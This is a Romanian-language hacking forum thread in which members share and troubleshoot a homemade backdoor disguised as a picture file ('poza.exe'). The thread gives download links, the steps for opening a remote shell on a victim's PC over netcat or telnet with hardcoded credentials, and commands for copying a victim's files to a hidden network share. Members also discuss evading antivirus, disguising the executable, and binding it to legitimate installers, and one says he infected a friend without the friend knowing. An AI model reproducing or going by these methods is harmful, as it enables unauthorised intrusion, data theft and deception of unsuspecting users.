Bine ati venit pe HackTeam Forum !
Aici veti gasi o gama larga de metode de hack atat pe Windows cat si pe platforme Linux/Unix , programe in consecinta ,tutoriale .
In acelasi timp aici veti gasi si asistenta help in materie corespunzatoare . Precizam ca tot ce se gaseste pe acest site este doar in scop de dezvoltare iar voi va asumati intreaga raspundere pt actiunile pe care le savarsiti . || SS-TEAM || Va Multumeste pt vizita !
|
Nu sunteti logat.
Lista Forumurilor Pe Tematici
|
Nou pe simpatie: karina22 pe Simpatie.ro
 | Femeie 25 ani Bucuresti cauta Barbat 25 - 54 ani |
|
|
Bine ati venit pe HackTeam Forum !ReguliInregistrareLoginPoze
|
| #1 |
XplicitMembruDin: greseala
Postari: 63
|
|
http://rapidshare.de/files/27139869/netcat.rar.html metoda este relativ simpla... in arhiva uploadata gasiti fisierele "backdoor.exe" pe care il trimiteti victimei, si programul netcat cu care va veti conecta la victima dupa ce victima a rulat backdoor-ul deschideti cmd, va duceti in directorul in care ati dezarhivat nc.rar, apoi dati comanda "nc ip_victima 9876" (fara ghilimele) dupa ce ati dat comanda o sa aveti acces la cmd-ul victimei ...odata ajunsi aici posibilitatile sunt nelimitate ...insa asta las la imaginatia voastra dupa cum vedeti sunt multe metode de a patrunde intr-un Pc, idei sa fie... babay and have phun !
|
|
| |
|
| #2 |
|
|
bine ma .. si banuiesc ca backdoor.exe ii detectat de av.. nu? 
_______________________________________ Be a lamer fuck the hacker
|
|
| |
|
| #3 |
|
|
-in primul rand link-ul pe care ni l-ai oferit e de tot rahatu.
* next time uploadeaza-l pe : * -garantat e detectat de AV. -nu sunt doua fisiere , ( romana te omoara ) , ci doua executabile , e o mica mare diferenta.
-ai uitat sa ne spui sa copiem , netcat in system32 , sa fim siguri 
-in rest metoda o folosesti , pentru lameri care nu au AV 
_______________________________________

|
|
| |
|
| #4 |
XplicitMembruDin: greseala
Postari: 63
|
|
multicos ...este detectat dekt de kaspersky, NOD32 si Panda (l-am scanast pe virustotal.com) .. -la cursurile de romana nu mi-a explicat nimeni cum sta treaba cu fisieru si executabilu` :zzz info nu am facut) ...si in plus ora la care am postat a fost cam tarzie pt mine -nu cred ca am uitat ceva... ce te face pe tine sa crezi ca trebuie copiat in system32 ...ca eu unu chiar nu inteleg
...alta metoda de a avea acces la un PC este: http://rapidshare.de/files/27055784/tutorial.rar.html imposibil sa nu reusiti intra cu una din metode ...pt mine merg perfect ambele
|
|
| |
|
| #5 |
|
|
daca tot sunt detectabile...mai bine folosesti prorat are cele mai multe optiuni cred...si e foarte usor de folosit ....my opinion
|
|
| |
|
| #6 |
XplicitMembruDin: greseala
Postari: 63
|
|
ma frate eu am kaspersky 6.0 cu update la zi si nu detecteaza metodele de mai sus (defapt detecteaza doar daca umblu la setari si activezi sa detecteze "potentialy dangerous software" ...care nu este activat default), NOD32 deasemenea nu il detecteaza, Avast! e orb...astia sunt av cei mai des utilizati. ...hai ca incerc totusi sa fac ceva care este cu adevarat nedetectabil de toti av
|
|
| |
|
| #7 |
|
|
Xplicit a scris:
l-am scanast pe virustotal.com |
Cea mai mare prostie , in cateva ore/zile , devine detectabil 
_______________________________________

|
|
| |
|
| #8 |
XplicitMembruDin: greseala
Postari: 63
|
|
 virustotal are si optiunea de a nu trimite fisierul uploadat catre companiile de av acum nu stiu daca acea optiune este respectata de ei sau este "pt ochii lumii"
|
|
| |
|
| #9 |
XplicitMembruDin: greseala
Postari: 63
|
|
ok ...am promis ca o sa va fac ceva cu ajutorul caruia puteti patrunde in alte sisteme, si care sa fie TOTAL nedetectat de TOTI av
http://rapidshare.ro/download.php?id=S7 ... vilPAFhboI pass: hackteam
sa nu va asteptati la un program gen ProRat ...este un program modest ...acesta, odata trimis victimei, ii porneste serviciul telnet pe portul 65535, login: xplicit , password: hackteam deocamdata programul este BETA trebuie sa mai lucrez putin la el deoarece aveti acces limitat la calculatorul victimei, neputand face mare lucru in el ...insa sunt multe exploituri pt windoze excalation privileges care va pot garanta acces maxim la sistem
|
|
| |
|
| #10 |
XplicitMembruDin: greseala
Postari: 63
|
|
am reusit sa rezolv si problema accesului limitat http://rapidshare.ro/download.php?id=3c ... Z6i2aEEQAY pass: hackteam din pacate va puteti conecta la PC victimei doar dupa ce aceasta reseteaza calculatorul ...sper ca stiti cum sa faceti asta =>start=>run=>cmd=>telnet ip_victima 65535 o sa va apara un mesaj ...nu conteaza ce scrie in el..voi dati n (enter) login: xplicit password: hackteam si in cateva secunde o sa aveti acces total asupra PC-ului respectiv
|
|
| |
|
| #11 |
|
|
A reusit cineva sa se conecteze??daca ati mai incercat postati si voi aici.....Bafta!!...
_______________________________________ ~~~~~~~~~~~~~~~~~~Xploder~~~~~~~~~~~~~~~~~~~~~
|
|
| |
|
| #12 |
|
|
SUNT UN NOOB.ok am marturisito dupa ce lam testat pe mine si merge 100% si e super(ai acces ca administrator al cmd-ul victimei) dupa ce lam rulat ep mine am vazut cu adevarat ce dragutz e acest sai zicem 'program' desi in mare parte nu e.windowsul este hackerit cu propriiler sale arme 
_______________________________________
 R3SPECT
|
|
| |
|
| #13 |
suriMembru
Postari: 772
|
|
Siii... ZA n-are nimeni ?
Adica, vreau sa spun ca nu e nevoie sa fie detectat programul, este suficienta interzicerea accesului.
|
|
| |
|
| #14 |
|
|
Xplicit a scris:
din pacate va puteti conecta la PC victimei doar dupa ce aceasta reseteaza calculatorul |
la mine a mers si fara sa dau restart
prin sp2 trece ca prin varza (desptept xplicit asta ) dar insa la ZA(nu il am deci presupun)ca va depinde de victima daca va lasa procesul sa foloseasca netu sau nu p.s.:daca am spus vreo prostie scuzatzima sunt n00b 
_______________________________________
 R3SPECT
|
|
| |
|
| #15 |
suriMembru
Postari: 772
|
|
Ai spus foarte bine, depinde de celalalt.
Eu, de exemplu, nu permit ce nu pricep ce se intampla, si foarte rar las ZA sa memoreze permisiunile. Insa de obicei dai peste useri care considera astea "sacaieli" 
|
|
| |
|
| #16 |
|
|
la ZA erorile au anumite culori + informatiile de al smartdefense (semaforul ) deci (nu am ZA dar lam avut)daca ptr telnet culoarea la smart defense este verde pai e usor de ghicit ce vor face majoritatea userilor 
_______________________________________
 R3SPECT
|
|
| |
|
| #17 |
|
|
Sunt destui care dau allow, ca daca nu dau allow cine stie ce nu merge asa ca firewall tre sa stii ceva si acolo mai ales daca el iti recomanda ca sa dai allow e grav )...I-am zis cuiva..sa isi puna fw si mi-a zis ca nu are nevoeie ca e plictisit de intrebarile idioate pe care le pune...(firewallu)
_______________________________________ ~~~~~~~~~~~~~~~~~~Xploder~~~~~~~~~~~~~~~~~~~~~
|
|
| |
|
| #19 |
|
|
Da..
psy a scris:
Dar ia zi-ne care este este diferenta dintre un fisier si un executabil ? |
*de obicei fisierele de orice tip au un header , in header avand mici informatii despre ele , spre deosebire de executabile ( fisiere binare ) care in header au cateva mici instructiuni care comunica cu procesorul,mai departe avand bocuri intregi , pe cand fisierele normale , nu au blocuri de instructiuni.
*si alta deosebire : fisierele binare aka executabilele sunt scrise in intregime in cod masina,pe cand fisierele normale ma refer , sunt scrise intr-un format special ( poate fi propietar sau nu , dar in nici un caz ca executabilele in cod masina ).
*practic sunt foarte diferite. cam asta e diferenta dintre un fisier si un executabil. { sau poate crezi ca ma insel dinnou ? better ia un manual deoarece imaginea ta despre aceasta lume e complet deraiata }
psy a scris:
Nu prea ai idee despre ce vorbesti ,nu? |
Eu , ba bine ca da, tu din cate vad si din alte posturi ale tale , nu prea ai idee ce vorbesti.
P.S. : si eu ma amuz pe forum , si acu ma amuz de tine , chestia la care m-ai contrazis e elementara.
{no comment}
_______________________________________

|
|
| |
|
| #20 |
psyMembruDin: timisoara
Postari: 92
|
|
 Zici ca executabilele(sau fisierele executabile) nu au header ? Acum cum se face ca poti afisa headerul unu executabil...program scris in assembler... Cum se face ca o functie de genul func(file) poate chema un exe ? Desigur, aia care au inventat limbajele de programare nu prea au stiut diferenta dintre fisier si executabil. Scuze
|
|
| |
|
| #21 |
psyMembruDin: timisoara
Postari: 92
|
|
Ah..am uitat..si fostul meu profesor de programare, care a fost profesor si cercetator la Berkley SUA nu prea stie notiuni elementare. Rusine lui. P.S. Chiar acum am vazut. Ceea ce e si mai comic este faptul ca ai scris fisier executabil 
|
|
| |
|
| #22 |
|
|
Xplicit a scris:
am reusit sa rezolv si problema accesului limitat http://rapidshare.ro/download.php?id=3c ... Z6i2aEEQAY pass: hackteam din pacate va puteti conecta la PC victimei doar dupa ce aceasta reseteaza calculatorul ...sper ca stiti cum sa faceti asta =>start=>run=>cmd=>telnet ip_victima 65535 o sa va apara un mesaj ...nu conteaza ce scrie in el..voi dati n (enter) login: xplicit password: hackteam si in cateva secunde o sa aveti acces total asupra PC-ului respectiv |
Xplicit plz.....il poti uploada inka odata ca HABAR nam de ce nu imi porneste linku ....
_______________________________________

|
|
| |
|
| #23 |
XplicitMembruDin: greseala
Postari: 63
|
|
nici la mine nu se incarca pagina...cred ca au probleme cei de la rapidshare.ro Link Nou
|
|
| |
|
| #24 |
|
|
ms man :P
_______________________________________

|
|
| |
|
| #25 |
|
|
xplicit...am incerkat asta pe mine ...merge..se conecteaza.....si dupa toate astea.....cu ce putem hackeri victima ?? zi-ne ceva comenzi utile man ca eu sunt mai noob umpic :P.....
cheers
_______________________________________

|
|
| |
|
| #26 |
|
|
iti zic eu o super comanda c:help

p.s:backdoor-ul asta nu va deveni asa repede detectat de vreun AV 
_______________________________________
 R3SPECT
|
|
| |
|
| #27 |
|
|
MDA........pfffff de ce nu mam gandit ?  
_______________________________________

|
|
| |
|
| #28 |
XplicitMembruDin: greseala
Postari: 63
|
|
momenzi utile? hmm ...stai sa ma gandesc cam ce ti-ar trebui
Code:
dir (comanda folosita pt a afisa tot ce contine directorul in care va aflati)
cd nume_director (comanda folosita pt a intra in directorul specificat)
cd .. (comanda folosita pt a iesi din directorul in care va aflati)
msg * mesaj (comanda folosita pt a afisa un mesaj victimei)
md numed_director (comanda folosita pt a creea un director)
del nume_fisier (comanda folosita pt a sterge un fisier)
copy D:nume_fisier \ip_taushare$ (comanda folosita pt a copia din LAN un fisier de pe hdd victimei in folderul sharat de tine ...folderl sharat trebuie sa aiba optiunea "Allow network users to change my file" activata ...o sa explic imediat si ce reprezinta caracterul $ care preceda numele folderului sharat )
copy \ipshare$program.exe C:Windows (comanda asemanatoare cu cea precedenta numai ca in acest caz fisierul este copiat din foderul sharat de tine la victima pe hdd)
(pt ca cei din retea sa nu vada folderul sharat de voi, atunci cand sharati scrieti la Share name "numeshare$". astfel folderul nu va aparea atunci cand un user va accesa Pc-ul vostru)
pt a rula un program scrieti pur si simpu numele acelui program (+ optiunile programului daca este cazul) |
|
|
| |
|
| #29 |
|
|
nu face nimeni nimic pentru cei care nu pot downloada de pe rapidshare?sau eu is singuru?
|
|
| |
|
| #30 |
suriMembru
Postari: 772
|
|
@tomavasi: Ce legatura are rapidshare cu titlul topicului ?
Pentru ca nu ai respectat regulile te blestem sa nu-ti raspunda nimeni pana nu-ti pui cererea unde trebuie (citeste regulile si vei afla unde).
|
|
| |
|
| #31 |
XplicitMembruDin: greseala
Postari: 63
|
|
suri ...cred ca cererea lui are legatura cu topicul dar nu ai inteles ce vrea omu` sa zica ...sau poate am inteles eu gresit? tomavasi uite aici un link de megaupload: http://www.megaupload.com/?d=Z3CYJZ7V
|
|
| |
|
| #32 |
|
|
xplicit....uite care e problema :P....tu ai bagat numele la fishier poza.exe si icoana e cea de la picture.....dar e mai greu de fentat omu asa.....ca nu prea ai ce sa ii zici......ca dak ii zici ca iti dau o POZA (la singular ) atunci te intreaba de ce e .exe ......
dak zici ca sunt MAI MULTE poze....te intreaba de ce e .exe dar ii poti zice ca e arhivat.....dar tot are icoana de la picture.....deci tot o problema......o poti rezolva :P...??? sau zi-ne cum sa facem 
thx
_______________________________________

|
|
| |
|
| #33 |
|
|
poti binda poaza.exe cu un alt fisier
_______________________________________
 R3SPECT
|
|
| |
|
| #34 |
|
|
k man.....am mai auzit de bindat asta....da r cu ce program il pot face :P ?
_______________________________________

|
|
| |
|
| #36 |
|
|
*** ma da jumate din ele in alta limba decat engleza :P.....da ms oricum
_______________________________________

|
|
| |
|
| #37 |
|
|
si daca isi sterge acea poza din pc victima ....mai ai contro asupra pc`ului?
|
|
| |
|
| #38 |
|
|
progrmaul deja e executat , e bagat in registri si in system files , dupa ce ai detonat bomba mai au nevoie de cutia in care ai carat-o ?
_______________________________________

|
|
| |
|
| #39 |
|
|
lol esti sigur ca asta face?
_______________________________________
 R3SPECT
|
|
| |
|
| #40 |
|
|
Sal...Am reinst windowsu pe alt calculator, nu are nici fw nici av si nici fw de la xp nu e activat.Am rulat poza.exe am dat restart si tot nu imi merge.Imi apare could not open ...bla bla bla
am sris asa in cmd>> telnet xxx.xxx.xxx.xxx 65535
Am facut ceva gresit??daca da unde?Vreau sa incerc asta pe propriul calculator(adik acela fara fw si fara av) pt ca am inteles ca cineva a reusit acest lucru,
As avea nevoie de acest "programache".Astept reply. Bafta!!..
ps: am rulat i separat acel .reg si .bat ***..si tot nu reusesc sa ma conectez...cine stie ce *** fac aiurea......creca de la beut
_______________________________________ ~~~~~~~~~~~~~~~~~~Xploder~~~~~~~~~~~~~~~~~~~~~
|
|
| |
|
| #41 |
|
|
de fapt comanda in telnet e o xxx.xxx.xxx.xxx 65535
p.s:calculator pe care ai rulat poza.exe era conectat la o retzea? p.s incearca fara restart.la mine a mers fara restart dupa ce a mrulat poza.exe
_______________________________________
 R3SPECT
|
|
| |
|
| #42 |
|
|
comanda cu o o dai atunci cand ai intrat in telnet(nu cred ca am zis bine dar v-ati prins voi)...am incercat si asa si tot nu merge...am luat ambele variante am uitat sa precizez asta. Oricum trebuia sa mearga si asa...
Si ca sa iti raspund..logic ca era conectat la retea numai ca nu are placa de retea si nu merge netu pe el ca inca nu i-am cumparat monitor...***....dar vreau sa ma conectez pana una alta
_______________________________________ ~~~~~~~~~~~~~~~~~~Xploder~~~~~~~~~~~~~~~~~~~~~
|
|
| |
|
| #43 |
|
|
ma da pe portu 65535 merge doar ultima versiune de al backdoorul asta deci ultimele link-uri
_______________________________________
 R3SPECT
|
|
| |
|
| #44 |
|
|
Xplicit a scris:
am reusit sa rezolv si problema accesului limitat http://rapidshare.ro/download.php?id=3c ... Z6i2aEEQAY pass: hackteam din pacate va puteti conecta la PC victimei doar dupa ce aceasta reseteaza calculatorul ...sper ca stiti cum sa faceti asta =>start=>run=>cmd=>telnet ip_victima 65535 o sa va apara un mesaj ...nu conteaza ce scrie in el..voi dati n (enter) login: xplicit password: hackteam si in cateva secunde o sa aveti acces total asupra PC-ului respectiv |
De aici am luat poza.exe...
ps:inca mai astept reply-uri...se ofera careva sa fac si io o proba pe el? )
_______________________________________ ~~~~~~~~~~~~~~~~~~Xploder~~~~~~~~~~~~~~~~~~~~~
|
|
| |
|
| #45 |
|
|
nush cum ati facut voi...dar eu am reushit pe un amic fara sa stie el...merge totul perfect ...am acces la calc lui....DAR.......
....e o mica problema.....in C:documents and settings apare un folder numit "Xplicit" care are alte subfoldere cu desktop etc. care sunt GOALE ...........nu se poate preveni asta??
_______________________________________

|
|
| |
|
| #46 |
|
|
Xplicit a scris:
momenzi utile? hmm ...stai sa ma gandesc cam ce ti-ar trebui
Code:
dir (comanda folosita pt a afisa tot ce contine directorul in care va aflati)
cd nume_director (comanda folosita pt a intra in directorul specificat)
cd .. (comanda folosita pt a iesi din directorul in care va aflati)
msg * mesaj (comanda folosita pt a afisa un mesaj victimei)
md numed_director (comanda folosita pt a creea un director)
del nume_fisier (comanda folosita pt a sterge un fisier)
copy D:nume_fisier \ip_taushare$ (comanda folosita pt a copia din LAN un fisier de pe hdd victimei in folderul sharat de tine ...folderl sharat trebuie sa aiba optiunea "Allow network users to change my file" activata ...o sa explic imediat si ce reprezinta caracterul $ care preceda numele folderului sharat )
copy \ipshare$program.exe C:Windows (comanda asemanatoare cu cea precedenta numai ca in acest caz fisierul este copiat din foderul sharat de tine la victima pe hdd)
(pt ca cei din retea sa nu vada folderul sharat de voi, atunci cand sharati scrieti la Share name "numeshare$". astfel folderul nu va aparea atunci cand un user va accesa Pc-ul vostru)
pt a rula un program scrieti pur si simpu numele acelui program (+ optiunile programului daca este cazul) |
|
man....am facut exact cum ai scris tu: copy d:nume_fisier \ip_meushare$ dar nu merge.....faza care no inteleg eu este.....trebe scris ceva in locul lui "share$" ???si de asemenea nam inteles partea asta: " (pt ca cei din retea sa nu vada folderul sharat de voi, atunci cand sharati scrieti la Share name "numeshare$". astfel folderul nu va aparea atunci cand un user va accesa Pc-ul vostru) " ........nameshare$ unde apare ....? fi mai explicit plz :P
ms
_______________________________________

|
|
| |
|
| #47 |
|
|
mai darkspider.....ms de linkuri inka odata :P....dar.....am luat mai mult de jumate din bindere.....dar nu e TOCMAI ce caut.....nu sunt bindere care sa "lipeasca" 2 fisiere (.jpg si .exe de ex.) si sa le salveze .jpg , .bmp , etc.. ??deoarece cand ii zici unuia ca vrei sa ii dai o poza...nu o ia ca vede ca e .exe...chiar dak poza se deschide..... !!....putini iau tzapa....si cu .jpg o mushca totzi 
cheers
_______________________________________

|
|
| |
|
| #48 |
suriMembru
Postari: 772
|
|
Si cum vrei sa se execute un .jpg ?
Extensia .jpg ii "explica" sistemului de operare ca este vorba de un fisier care nu va fi executat, ci el insusi va fi o intrare (flux de date) pentru un program care va transforma informatiile din el in comenzi pentru pixelii din ecran, sau pentru imprimanta. Fisierul nu este el insusi poza, ci contine doar informatii cum alt program sa o faca. Pentru ca programul "bindat" in poza sa se exacute, trebuie ca fisierul sa fie executabil, ceea ce .jpg nu este, deci no way cu "ideea" ta.
Admitand ca treaba ar functiona, si tinand cont de miliardele de .jpg-uri care circula zilnic, am fi plini de troieni - tu nu ai face exceptie, altii te-ar f*** de nu te-ai vedea.
Deci fisierul este "poza.jpg.exe" si te bazezi pe faptul ca lameru' a lasat setarile folderelor "default" si nu afiseaza extensiile, ca urmare el vede "poza.jpg.exe" drept "poza.jpg". Intrucat STIE ce e ".jpg" nu-i bate la ochi (desi ar trebui, ca daca celelalte fisiere n-au extensia afisata, de ce tocmai asta o are).
Eh, m-am descarcat, poate citesc (si sper ca si pricep ceva) si altii... 
|
|
| |
|
| #49 |
|
|
Rifl3man a scris:
nu sunt bindere care sa "lipeasca" 2 fisiere (.jpg si .exe de ex.) si sa le salveze .jpg , .bmp , etc.. ??deoarece cand ii zici unuia ca vrei sa ii dai o poza...nu o ia ca vede ca e .exe...chiar dak poza se deschide..... !!....putini iau tzapa....si cu .jpg o mushca totzi |
da cine a zis ca trebuie neaparat sa fie bindata poza.exe cu un .jpg? iei frumos un .exe (un kit de instalare de la un program)si il bindezi cu poza.exe ce e asa greu?
_______________________________________
 R3SPECT
|
|
| |
|
| #50 |
|
|
suri..k am inteles idea ..Gg darkspider.....ok o sa incerk...dar ma enerveaza o chestie....am bindat 2 exe (poza.exe si un battlelan.exe) ....(nici unul neavand virus) si iam dat victimei battlelan.exe (fisierul bindat) care avea un troian !!.....asta de la binder presupun..... 
_______________________________________

|
|
| |
|